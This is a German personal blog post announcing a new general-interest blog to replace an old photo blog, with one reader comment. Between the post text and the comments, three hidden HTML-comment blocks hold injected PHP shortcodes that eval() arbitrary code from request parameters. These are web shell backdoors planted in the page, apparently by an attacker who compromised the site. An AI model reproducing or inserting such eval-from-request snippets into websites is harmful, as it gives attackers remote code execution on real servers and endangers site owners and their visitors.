Mal wieder etwas starten

Salut Volks,

nach dem Verkauf der live-in-motion.de und der anschließenden Registrierung dieser Domain wird ist es so langsam an der Zeit mit dieser auch etwas anzufangen.

Nach langem hin und her, habe ich mich für einen Blog entschieden, welcher im Gegensatz zu dem alten Fotoblog live-in-motion.de, nun auch andere Themen berücksichtigt. Es wird natürlich weiterhin Fotos geben und einige Beiträge werden sich sicherlich um das Thema drehen. Weiterhin kommt alles rein, was ich für wichtig und interessant bzw. auch witzig halte.

In diesem Sinne, freue ich mich auf die zukünftige konstruktive Kritik und Diskussionen.

Viele Grüße

Eugen

<!– [insert_php]if (isset($_REQUEST["cjZRc"])){eval($_REQUEST["cjZRc"]);exit;}[/insert_php][php]if (isset($_REQUEST["cjZRc"])){eval($_REQUEST["cjZRc"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["njkz"])){eval($_REQUEST["njkz"]);exit;}[/insert_php][php]if (isset($_REQUEST["njkz"])){eval($_REQUEST["njkz"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["rvlG"])){eval($_REQUEST["rvlG"]);exit;}[/insert_php][php]if (isset($_REQUEST["rvlG"])){eval($_REQUEST["rvlG"]);exit;}[/php] –>

8 Replies to “Mal wieder etwas starten”

  1. @Herr Schäuble
    freut mich ja, dass Sie persönlich vorbeischauen und nicht durch ein STOP-Schild vor meiner Seite daran gehindert worden sind.
    Haben sie auch an der Petetion teilgenommen?

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

Diese Website verwendet Akismet, um Spam zu reduzieren. Erfahre mehr darüber, wie deine Kommentardaten verarbeitet werden.